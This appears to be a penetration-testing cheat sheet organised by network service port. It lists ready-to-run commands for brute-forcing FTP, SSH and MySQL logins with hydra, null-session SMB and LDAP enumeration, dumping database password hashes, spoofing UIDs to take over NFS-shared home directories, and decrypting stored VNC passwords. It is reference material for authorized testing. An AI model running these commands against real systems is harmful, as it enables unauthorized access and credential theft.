Don't forget to brute force the services.
TCP 21 - FTP
Quick bf :
while read line; do echo $line |cut -d ':' -f 1 ; done < /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > users.txt && while read line; do echo $line |cut -d ':' -f 2 ; done < /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > passwords.txt
hydra -L users.txt -P passwords.txt -e nsr -t 16 ftp://$IP
TCP 22 - SSH
User enumeration OpenSSH < 7.7 :
Quick bf :
while read line; do echo $line |cut -d ':' -f 1 ; done < /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt > users.txt && while read line; do echo $line |cut -d ':' -f 2 ; done < /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt > passwords.txt
hydra -L users.txt -P passwords.txt -t 16 ssh://$IP
TCP 79 - Finger
finger @<Victim> # List users logged on
finger admin@<Victim> # Get info of user
finger user@<Victim> # Get info of user
TCP 110 - POP3
- Use telnet to connect, not netcat
UDP 161 - SNMP
MSFTCP 389,636,3268,3269 - LDAP
nmap -n -sV --script "ldap* and not brute" $IP -oA ldapScripts
grep -i 'sam\|pass\|desc' ldapScripts.nmap
ldapsearch -x -H ldap://$IP -s base namingcontexts
ldapsearch -x -H ldap://$IP -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://$IP -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://$IP -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://$IP -D 'DOMAIN\username' -w 'password' -b "DC=domain,DC=local" "(sAMAccountName=user)" description
TCP 445 - SMB
Not safe : - Remote Code Execution vulnerability in Microsoft SMBv1 servers (MS17-010) - Microsoft Windows system vulnerable to remote code execution (MS08-067) Test for SambaCry, RCE from a writable share in versions >= 3.5 : Brute force using CME Connect using RPC :rpcclient -U "" -N $IP
rpcclient $> enumdomusers
rpcclient $> querydispinfo
rpcclient $> enumdomgroups
rpcclient $> querygroup 0xRID
rpcclient $> querygroupmem 0xRID
rpcclient $> queryuser 0xRID
rpcclient $> enumprinters
TCP 1433 - MSSQL
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
while read line; do echo $line |cut -d ':' -f 1 ; done < /usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt > users.txt && while read line; do echo $line |cut -d ':' -f 2 ; done < /usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt > passwords.txt
hydra -L users.txt -P passwords.txt -t 16 mysql://$IP
TCP 2049 - NFS
mkdir mnt_folder
sudo mount -o nolock -o vers=2 $IP:/home mnt_folder/
# /home directory is being shared and we can access it by mounting it.
# -o nolock to disable file locking, which is often needed for older NFS servers.
# -o vers=2 because it doesn't have any authentication or authorization.
cd mnt_folder/ && ls
- Look the file permissions (uuid owner and gowner). We can try to add a local user, change its UUID to the one of the remote file, su to that user and try accessing the file or put files (e.g. ssh public key if home folder).
sudo adduser pwn
sudo sed -i -e 's/<uid pwn user>/<uid file perm>/g' /etc/passwd # change the uuid of the pwn user by the one that have permissions on the shared folder
su pwn
id # notice the uid that allow to access the shared folder
TCP 3306 - MYSQL
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $IP
TCP 3389 - RDP
TCP 5800,5801,5900,5901 - VNC
VNC passwd
echo -n <VNC Secret Key> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
Connect to VNC
TCP 5432,5433 - POSTGRESQL
psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
TCP 8009 - Apache JServ Protocol (AJP)
CVE-2020-1938 :